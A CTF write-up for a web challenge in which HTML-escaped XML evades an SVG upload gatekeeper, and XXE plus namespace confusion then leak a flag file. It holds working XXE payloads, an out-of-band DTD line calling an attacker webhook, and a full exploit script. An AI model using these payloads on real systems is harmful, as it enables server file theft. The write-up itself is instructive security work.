TJCTF 2026: Opening Night
Challenge Overview
The challenge presents a web gallery where users can upload SVG artwork. Each uploaded file is processed server-side: the SVG gets validated by a gatekeeper, and then metadata (title, description, dimensions) is extracted by a label writer and displayed on the gallery page. The key observation is that the output renders into three specific HTML sinks:
<h2>some title</h2>
<p>some description</p>
<dd>700 x 160</dd>
The challenge description says "The new gallery opens tonight." Three hints are provided that point toward a two-stage parsing pipeline with a differential vulnerability between the stages. Understanding how each stage interprets the uploaded file is the crux of this challenge. With only 12 total solves, this was one of the harder web challenges in the CTF, requiring a creative combination of two distinct bugs rather than a single straightforward vulnerability.
Two curators inspect each piece: one hangs the painting (carefully), the other writes the label (sloppily).
The gatekeeper only checks that your file looks like an SVG at the top. The label writer takes the first title/desc it sees by name, ignoring true namespace.
Don't look for hidden rooms, change how your art is "wrapped"! Payload must survive two interpretations: harmless text vs. XML.
Reading these hints together, a clear picture emerges:
- Hint 1 tells us there are two processing stages with different strictness levels. The first is careful (validates properly), the second is sloppy (cuts corners).
- Hint 2 reveals two bugs: the gatekeeper only checks the top of the file (not the full content), and the label writer uses a namespace-blind selector that matches title/desc regardless of their XML namespace.
- Hint 3 is the breakthrough: the payload must be "wrapped" differently, as harmless text to one stage and active XML to the other. This points directly to an encoding differential.
Reconnaissance
Before attempting any exploit, we need to understand the full attack surface of the gallery application. Let's walk through the normal upload flow and observe how the server processes our input.
Normal Upload Flow
Uploading a minimal, valid SVG file:
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<title>My Artwork</title>
<desc>A beautiful piece</desc>
<rect width="100%" height="100%" fill="#1a1a2e"/>
<text x="350" y="80" text-anchor="middle" fill="white" font-size="24">Hello World</text>
</svg>
The gallery page renders:
<h2>My Artwork</h2>
<p>A beautiful piece</p>
<dd>700 x 160</dd>
So the server extracts <title> → <h2>, <desc> → <p>, and dimensions → <dd>. The SVG image itself is also displayed. This confirms three output sinks we can potentially control.
Validation Behavior
Let's probe what the gatekeeper accepts and rejects. We test several malformed uploads:
| Test | Result | Inference |
|---|---|---|
| Plain text file with .svg extension | Rejected | Content-type or structure is validated |
| SVG without xmlns | Rejected | Requires proper SVG namespace |
| Valid SVG with <script> inside | Rejected | Blacklists dangerous elements |
| SVG with DOCTYPE declaration | Rejected | DOCTYPE is stripped or blocked |
| SVG with extra namespace elements | Accepted | Non-SVG namespaces are allowed |
| SVG with CDATA section | Accepted | CDATA passes through |
| SVG with HTML entities in title | Accepted & decoded | html.unescape() is applied |
The critical findings: DOCTYPE declarations are rejected, but additional XML namespaces are allowed, and HTML entities are decoded. This immediately rules out straightforward XXE and points toward the namespace confusion + encoding differential approach.
The html.unescape() Discovery
One test reveals the second stage's behavior. We upload an SVG containing HTML entities in the title:
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<title>Test &amp; Entity &lt;script&gt;</title>
<desc>Testing decode</desc>
</svg>
The rendered output shows:
h2: 'Test & Entity <script>'
The HTML entities &amp; and &lt; have been decoded: &amp; became & and &lt;script&gt; became a literal <script> tag. This points to the backend calling html.unescape() on the content before or during parsing. This is our attack vector.
The server runs html.unescape() on the uploaded content before XML parsing. This means if we upload HTML-escaped XML, the gatekeeper sees harmless text, but after unescaping, the XML parser receives fully functional XML, including DOCTYPE and entity declarations.
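The decoding step is easy to reproduce locally with Python's standard library. This is a minimal sketch, assuming the backend really does use html.unescape() as inferred above; the sample string is illustrative and not taken from the server.

```python
import html

# What an uploader would send: markup hidden behind HTML entities.
escaped = "Test &amp; Entity &lt;script&gt;"

# html.unescape() turns named and numeric character references back
# into the characters they stand for.
decoded = html.unescape(escaped)
print(decoded)

# The escaped form contains no angle brackets; the decoded form does.
has_markup_before = "<" in escaped
has_markup_after = "<" in decoded
```

Any check that runs on the escaped string and looks for a literal < will find nothing, which is the property the rest of the exploit relies on.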
Bug 1: Namespace Confusion
Hint 2 tells us the label writer "takes the first title/desc it sees by name, ignoring true namespace." This means the metadata extraction uses a namespace-blind selector, most likely an XPath like //*[local-name()="title"] or a wildcard lookup such as ElementTree's find(".//{*}title").
In XML, namespaces exist precisely to disambiguate elements with the same local name. A proper SVG parser should only match {http://www.w3.org/2000/svg}title, not {urn:not-svg}title. But the label writer doesn't check namespaces, so we can inject a title element in a fake namespace that the label parser will still match.
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<metadata>
<x:title xmlns:x="urn:not-svg">INJECTED_TITLE</x:title>
<x:desc xmlns:x="urn:not-svg">INJECTED_DESC</x:desc>
</metadata>
<title>SAFE_TITLE</title>
<desc>SAFE_DESC</desc>
</svg>
The server renders:
h2: 'INJECTED_TITLE'
p : 'INJECTED_DESC'
Despite <x:title> belonging to the urn:not-svg namespace, the label parser matched it. The SVG validation also accepted it because non-SVG namespaced elements are permitted inside <metadata>. We now have full control over the label content, but this alone doesn't give us the flag. We need a way to introduce dynamic content expansion (reading a file from the server).
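The difference between a namespace-blind and a namespace-aware lookup can be shown with the standard library. This is a sketch of the behavior described above, not the server's code: first_by_local_name() is a hypothetical helper that mimics "first match by name", and the document is a trimmed copy of the upload.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

doc = """<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <metadata>
    <x:title xmlns:x="urn:not-svg">INJECTED_TITLE</x:title>
  </metadata>
  <title>SAFE_TITLE</title>
</svg>"""

root = ET.fromstring(doc)


def first_by_local_name(root, name):
    """Namespace-blind: return the first element whose local name matches."""
    for el in root.iter():  # iter() walks the tree in document order
        # ElementTree stores tags as "{namespace}local"; drop the namespace.
        if el.tag.rsplit("}", 1)[-1] == name:
            return el
    return None


# Sloppy lookup: the fake-namespace element comes first in document order.
blind = first_by_local_name(root, "title").text

# Strict lookup: only an element in the SVG namespace qualifies.
aware = root.find(f".//{{{SVG_NS}}}title").text

print(blind, aware)
```

The blind lookup returns the injected value because <metadata> precedes the real <title> in the document, which is why the payload places the fake elements first.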
We control the label text, but we can only put static strings there. We need XML entity expansion to dynamically include file contents at parse time. But DOCTYPE declarations are blocked by the gatekeeper... or are they?
Dead Ends
Before arriving at the correct solution, I tried the obvious alternative attack vectors. Documenting these failures is important: they show why the parser differential approach is the path that works.
Raw DOCTYPE Doesn't Expand
Since we control the label, the natural next step is XML entity expansion. We try uploading a document with an internal entity declaration:
<!DOCTYPE svg [
<!ENTITY e "ENTITY_OK">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>
<x:title xmlns:x="urn:not-svg">&e;</x:title>
</metadata>
</svg>
The output is disappointing:
h2: '&e;'
The entity reference &e; is not expanded; it appears as a literal string. This leads many solvers to conclude that entity expansion is impossible. But we're just hitting the gatekeeper: the DOCTYPE is being stripped during validation, so the XML parser never sees the entity declaration.
External XXE and XInclude Blocked
External entity pointing at the flag file:
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>
<x:title xmlns:x="urn:not-svg">&xxe;</x:title>
</metadata>
</svg>
Out-of-band (OOB) parameter entity loading a remote DTD:
<!DOCTYPE svg [
<!ENTITY % dtd SYSTEM "http://attacker.webhook.site/evil.dtd">
%dtd;
]>
<svg xmlns="http://www.w3.org/2000/svg">
...
</svg>
XInclude:
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xi="http://www.w3.org/2001/XInclude">
<metadata>
<x:title xmlns:x="urn:not-svg">
<xi:include href="file:///flag" parse="text"/>
</x:title>
</metadata>
</svg>
Every external access vector fails:
- External Entity: File access via external entities is completely disabled.
- OOB Parameter Entities: No callback was ever received, confirming outbound network access is blocked.
- XInclude: Not processed by the parser. XInclude support is not enabled.
Not SSTI or Multipart Confusion
- Multipart tricks: The application consistently uses the real file part and rejects base64-encoded content.
- SSTI: {{7*7}} and ${7*7} printed literally. No template injection.
- XSLeak: No information leakage through error messages or timing.
Every straightforward attack vector fails. The solution requires understanding the two-stage processing pipeline at a deeper level.
Breakthrough: Parser Differential
Returning to Hint 3 ("Payload must survive two interpretations: harmless text vs. XML"), we now have all the pieces. The question is: how can the same bytes be harmless text to one parser but valid XML to another?
The breakthrough is HTML-encoding. If we HTML-escape the entire XML document before uploading, the gatekeeper sees only escaped text: no XML tags, no DOCTYPE, nothing suspicious. But the backend calls html.unescape() before passing the content to the XML parser, reconstructing the original XML with all its entity declarations intact.
Consider what happens when we HTML-escape an XML document. Before escaping:
<!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>
<svg xmlns="http://www.w3.org/2000/svg">...</svg>
After escaping:
&lt;!DOCTYPE svg [&lt;!ENTITY flag SYSTEM &quot;file:///flag&quot;&gt;]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;...&lt;/svg&gt;
After HTML-escaping, every < becomes &lt;, every > becomes &gt;, and every & becomes &amp;. The gatekeeper inspects this and sees only escaped text: no XML structure, no DOCTYPE, nothing to validate or reject. The file passes through as harmless content.
Then the backend performs html.unescape(), which reverses every HTML entity back to its original character. The XML parser receives the clean, unescaped document, complete with DOCTYPE and entity declarations, and processes it normally.
A parser differential vulnerability occurs when two components process the same input differently due to different parsing rules, encoding assumptions, or processing stages. In this case, the gatekeeper treats the raw bytes as text (seeing no XML structure), while the label writer first unescapes and then parses as XML (seeing a complete document with entities). This semantic gap is the vulnerability.
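The semantic gap can be made concrete with a toy gatekeeper. This is a sketch under assumptions: gatekeeper_rejects() and its DOCTYPE pattern are hypothetical stand-ins for whatever check the real server performs, and the sample document is illustrative.

```python
import html
import re

# Hypothetical gatekeeper rule: reject anything containing a DOCTYPE.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def gatekeeper_rejects(raw: bytes) -> bool:
    """Return True when the raw upload contains a literal DOCTYPE."""
    return DOCTYPE_RE.search(raw) is not None


plain = '<!DOCTYPE svg [<!ENTITY e "x">]><svg xmlns="http://www.w3.org/2000/svg"/>'
wrapped = html.escape(plain, quote=True)

# Same document, two representations, two different verdicts.
rejects_plain = gatekeeper_rejects(plain.encode())
rejects_wrapped = gatekeeper_rejects(wrapped.encode())

# The second stage undoes the wrapping before it parses.
restored = html.unescape(wrapped)

print(rejects_plain, rejects_wrapped, restored == plain)
```

The check and the parser disagree about what the upload contains, even though neither one is wrong about the bytes it was handed.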
Why External Entities Work After Unescaping
The earlier failure happened because the gatekeeper was stripping the DOCTYPE before the XML parser ever saw it. The parser received a document without entity declarations, so &flag; was treated as an undefined entity and rendered literally.
Now, with the HTML-escape bypass, the gatekeeper never sees the DOCTYPE because it's hidden behind HTML entities. The html.unescape() step reconstructs the DOCTYPE after validation has already passed. The XML parser then receives the full document with entity declarations and expands them.
The server likely uses lxml.etree with network resolution disabled but local file resolution enabled, a common misconfiguration that allows file:// URIs in SYSTEM entities while blocking http://.
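import html
from lxml import etree

# Reconstructed sketch of the server logic, not recovered source.
# has_doctype(), is_valid_svg(), and reject() are hypothetical helpers;
# request is the web framework's request object.

# Stage 1: Gatekeeper, validates the raw upload
raw = request.files['svg_file'].read()
if has_doctype(raw):        # Checks for <!DOCTYPE in raw bytes
    reject("DOCTYPE not allowed")
if not is_valid_svg(raw):   # Checks for <svg> tag structure
    reject("Invalid SVG")

# Stage 2: Label Writer, unescapes and then parses
decoded = html.unescape(raw.decode())   # &lt; -> <, &amp; -> &, etc.
tree = etree.fromstring(decoded)        # Now sees DOCTYPE + entities!
# Namespace-blind search: match on local name only, take the first hit
title = tree.xpath('//*[local-name()="title"]')[0]
desc = tree.xpath('//*[local-name()="desc"]')[0]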
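The reconstructed pipeline can be exercised locally without the challenge server. The sketch below is an assumption-laden simulation: gatekeeper_ok() and label_title() are hypothetical stand-ins for the two stages, and an internal entity replaces the external file:///flag entity because the standard library's ElementTree does not expand external entities.

```python
import html
import xml.etree.ElementTree as ET


def gatekeeper_ok(raw: str) -> bool:
    """Stage 1 (assumed): refuse uploads whose raw text contains a DOCTYPE."""
    return "<!doctype" not in raw.lower()


def label_title(raw: str) -> str:
    """Stage 2 (assumed): unescape, parse, take the first title by local name."""
    root = ET.fromstring(html.unescape(raw))
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "title":
            return el.text or ""
    return ""


# Internal entity used as a stand-in for the external one in the challenge.
document = (
    '<!DOCTYPE svg [<!ENTITY flag "STAND_IN_VALUE">]>'
    '<svg xmlns="http://www.w3.org/2000/svg">'
    '<metadata><x:title xmlns:x="urn:not-svg">&flag;</x:title></metadata>'
    '<title>Safe Title</title>'
    '</svg>'
)
upload = html.escape(document, quote=True)

passes_raw = gatekeeper_ok(document)     # DOCTYPE visible, so refused
passes_wrapped = gatekeeper_ok(upload)   # DOCTYPE hidden, so accepted
title = label_title(upload)              # entity expanded after unescaping

print(passes_raw, passes_wrapped, title)
```

Both bugs are needed at once here: the wrapping gets the DOCTYPE past stage 1, and the name-only match lets the fake-namespace element supply the label.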
Final Exploit
Payload Construction
Because the HTML-unescape step happens before XML parsing, we can now place a DOCTYPE declaration at the very start of the document, ahead of the root element, which is the only position where XML allows it. After unescaping, the XML parser sees a proper DTD with entity definitions and expands them accordingly.
The complete payload before HTML-escaping:
<!DOCTYPE svg [
<!ENTITY flag SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
<metadata>
<x:title xmlns:x="urn:not-svg">&flag;</x:title>
<x:desc xmlns:x="urn:not-svg">Opening Night Gallery</x:desc>
</metadata>
<title>Safe Title</title>
<desc>Safe Description</desc>
<rect width="100%" height="100%" fill="white"/>
</svg>
Breaking down every component:
- <!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>: Declares an external entity named flag that reads the file /flag. This is the payload that the gatekeeper would normally reject.
- <x:title xmlns:x="urn:not-svg">: Fake-namespace title element. The label parser will match this first due to document order, ignoring that it's not in the SVG namespace.
- &flag;: Entity reference that will be expanded to the contents of /flag during XML parsing.
- <title>Safe Title</title>: Legitimate SVG title as a fallback. The label parser won't reach this because it already matched the fake-namespace one.
- <rect .../>: Valid SVG content so the image renders normally.
Applying HTML-Escape
Now we HTML-escape the entire document. Every <, >, &, and " gets converted to its HTML entity equivalent:
&lt;!DOCTYPE svg [
&lt;!ENTITY flag SYSTEM &quot;file:///flag&quot;&gt;
]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; width=&quot;700&quot; height=&quot;160&quot;&gt;
&lt;metadata&gt;
&lt;x:title xmlns:x=&quot;urn:not-svg&quot;&gt;&amp;flag;&lt;/x:title&gt;
&lt;x:desc xmlns:x=&quot;urn:not-svg&quot;&gt;Opening Night Gallery&lt;/x:desc&gt;
&lt;/metadata&gt;
&lt;title&gt;Safe Title&lt;/title&gt;
&lt;desc&gt;Safe Description&lt;/desc&gt;
&lt;rect width=&quot;100%&quot; height=&quot;100%&quot; fill=&quot;white&quot;/&gt;
&lt;/svg&gt;
Pay special attention to &amp;flag;, which is the HTML-escaped form of &flag;. After html.unescape(), &amp; becomes &, so the XML parser sees &flag;, which it then expands as an entity reference.
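The number of escaping passes matters, and a quick round trip shows why. This is a small illustrative check using only html.escape() and html.unescape(); the fragment is a shortened piece of the payload.

```python
import html

fragment = "<x:title>&flag;</x:title>"

# One pass of escaping, as used for the upload.
once = html.escape(fragment, quote=True)
print(once)

# A single unescape restores the entity reference exactly.
after_once = html.unescape(once)

# Escaping twice leaves the reference still escaped after one unescape,
# so an XML parser would read it as the literal text "&flag;".
twice = html.escape(once, quote=True)
after_twice = html.unescape(twice)

print(after_once == fragment, after_twice == once)
```

Since the backend is assumed to unescape only once, the document has to be escaped exactly once for &flag; to reach the XML parser as a live entity reference.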
Complete Exploit Flow
- HTML-escape the entire XML document: every <, >, &, and quote character gets converted to its HTML entity equivalent.
- Upload the escaped content as image/svg+xml.
- Gatekeeper inspects the raw bytes: it sees only &lt;, &gt;, and &amp; sequences. No <!DOCTYPE pattern. No <svg> tag. Passes validation as harmless text.
- Backend calls html.unescape(): all HTML entities are decoded back to their original characters. The full XML document is reconstructed.
- XML parser receives the clean document with <!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]> and processes the entity declaration.
- Entity expansion: &flag; resolves to the contents of /flag on the server's filesystem.
- Label parser extracts the expanded entity value via the namespace-blind title match and renders it in the <h2> tag.
- Flag appears in the gallery page output.
tjctf{y0ur_4r7w0rk_is_n0w_0n_displ4y}
Exploit Code
#!/usr/bin/env python3
"""
TJCTF 2026: Opening Night
Parser Differential via HTML-escape -> unescape -> XML entity expansion
Author: QA210 | 3rd solve / 12 total
"""
import html
import re
import sys
from urllib.parse import urljoin

import requests

TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"
FLAG_PAT = re.compile(r"tjctf\{[^}]+\}", re.IGNORECASE)


def craft_svg_payload():
    """
    Build the raw XML with DOCTYPE + external entity, then HTML-escape it.

    The raw XML contains:
    - DOCTYPE with SYSTEM entity pointing to /flag
    - Fake-namespace title/desc that the label parser matches
    - Entity reference &flag; in the fake-namespace title

    After html.escape(), the gatekeeper sees only escaped text.
    After html.unescape() on the backend, the XML parser sees the full
    document and expands &flag; to the file contents.
    """
    raw_xml = (
        '<!DOCTYPE svg [\n'
        '  <!ENTITY flag SYSTEM "file:///flag">\n'
        ']>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">\n'
        '  <metadata>\n'
        '    <x:title xmlns:x="urn:not-svg">&flag;</x:title>\n'
        '    <x:desc xmlns:x="urn:not-svg">QA210 Gallery</x:desc>\n'
        '  </metadata>\n'
        '  <title>Safe</title>\n'
        '  <desc>Safe</desc>\n'
        '  <rect width="100%" height="100%" fill="white"/>\n'
        '</svg>\n'
    )
    # The critical step: HTML-escape the entire document once.
    # Gatekeeper sees escaped text; backend unescapes before XML parse.
    return html.escape(raw_xml, quote=True).encode("utf-8")


def find_upload_endpoint(session):
    """Discover the upload form action and file field name."""
    r = session.get(f"{TARGET}/", timeout=30)
    action_m = re.search(r'action="([^"]*)"', r.text)
    # Assumes name="..." precedes type="file" on the same line of the form.
    field_m = re.search(r'name="([^"]*)".*type="file"', r.text)
    if not action_m or not field_m:
        # Fall back to a guessed endpoint and field name.
        return f"{TARGET}/upload", "file"
    # urljoin handles both relative and absolute form actions.
    return urljoin(f"{TARGET}/", action_m.group(1)), field_m.group(1)


def main():
    session = requests.Session()
    action_url, field_name = find_upload_endpoint(session)
    payload = craft_svg_payload()

    print(f"[*] Target: {TARGET}")
    print(f"[*] Action: {action_url}")
    print(f"[*] Field: {field_name}")
    print(f"[*] Payload: {len(payload)} bytes (HTML-escaped XML)")

    resp = session.post(
        action_url,
        files={field_name: ("opening.svg", payload, "image/svg+xml")},
        allow_redirects=True,
        timeout=30,
    )

    match = FLAG_PAT.search(resp.text)
    if match:
        print(f"[+] FLAG: {match.group(0)}")
    else:
        print("[-] Flag not found in response.")
        # Show the lines most likely to explain what went wrong.
        for line in resp.text.splitlines():
            if "title" in line.lower() or "flag" in line.lower():
                print(f"    {line.strip()}")


if __name__ == "__main__":
    main()
Running the Exploit
$ python3 solve.py https://opening-night.tjctf.org
[*] Target: https://opening-night.tjctf.org
[*] Action: https://opening-night.tjctf.org/upload
[*] Field: svg_file
[*] Payload: 587 bytes (HTML-escaped XML)
[+] FLAG: tjctf{y0ur_4r7w0rk_is_n0w_0n_displ4y}
Key Takeaways
This challenge demonstrates a classic parser differential attack. When two components process the same data using different rules, the gap between their interpretations becomes an attack surface. Security decisions made by one parser can be completely undermined by transformations applied before the second parser.
HTML entity encoding is a representation, not a security boundary. Applying html.unescape() before parsing effectively nullifies any validation that was performed on the escaped form. The lesson: always validate the decoded form of input, not the encoded form.
Using namespace-blind XML selectors like //*[local-name()="title"] instead of a fully-qualified lookup such as find("{http://www.w3.org/2000/svg}title") allows attackers to inject elements in fake namespaces that the parser still matches. Always use fully-qualified names when processing XML from untrusted sources.
1. Validate after decoding: Never validate encoded input and then decode before use. Decode first, then validate the decoded form.
2. Use namespace-aware parsers: Always match elements by their fully-qualified name including namespace URI.
3. Disable entity resolution: Configure XML parsers with resolve_entities=False and no_network=True. For defense-in-depth, also strip DOCTYPE declarations server-side.
4. Use allowlists, not denylists: Instead of blocking specific dangerous patterns (DOCTYPE, script tags), only allow known-safe structures.
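The first two recommendations can be combined in a few lines. This is a minimal sketch using the standard library rather than the server's presumed lxml setup; extract_title() is a hypothetical function, and it keeps the unescape step only to show that validation and parsing must operate on the same decoded string.

```python
import html
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"


def extract_title(upload: bytes) -> str:
    """Decode once, validate the decoded form, then parse that same string."""
    decoded = html.unescape(upload.decode("utf-8"))
    if "<!doctype" in decoded.lower():
        raise ValueError("DOCTYPE not allowed")
    root = ET.fromstring(decoded)
    if root.tag != f"{{{SVG_NS}}}svg":
        raise ValueError("root element is not in the SVG namespace")
    # Fully-qualified lookup: only a direct child in the SVG namespace counts.
    title = root.find(f"{{{SVG_NS}}}title")
    return (title.text or "") if title is not None else ""


# Fake-namespace injection no longer wins the lookup.
fake_ns = (
    '<svg xmlns="http://www.w3.org/2000/svg">'
    '<metadata><x:title xmlns:x="urn:not-svg">INJECTED</x:title></metadata>'
    '<title>SAFE_TITLE</title>'
    '</svg>'
).encode()
safe_title = extract_title(fake_ns)

# An HTML-escaped DOCTYPE is caught because the check runs after decoding.
wrapped = html.escape(
    '<!DOCTYPE svg [<!ENTITY e "x">]>'
    '<svg xmlns="http://www.w3.org/2000/svg"><title>&e;</title></svg>'
).encode()
try:
    extract_title(wrapped)
    wrapped_rejected = False
except ValueError:
    wrapped_rejected = True

print(safe_title, wrapped_rejected)
```

In a real service the simpler fix is to drop the unescape step entirely; the sketch keeps it so the ordering of decode, validate, and parse is visible.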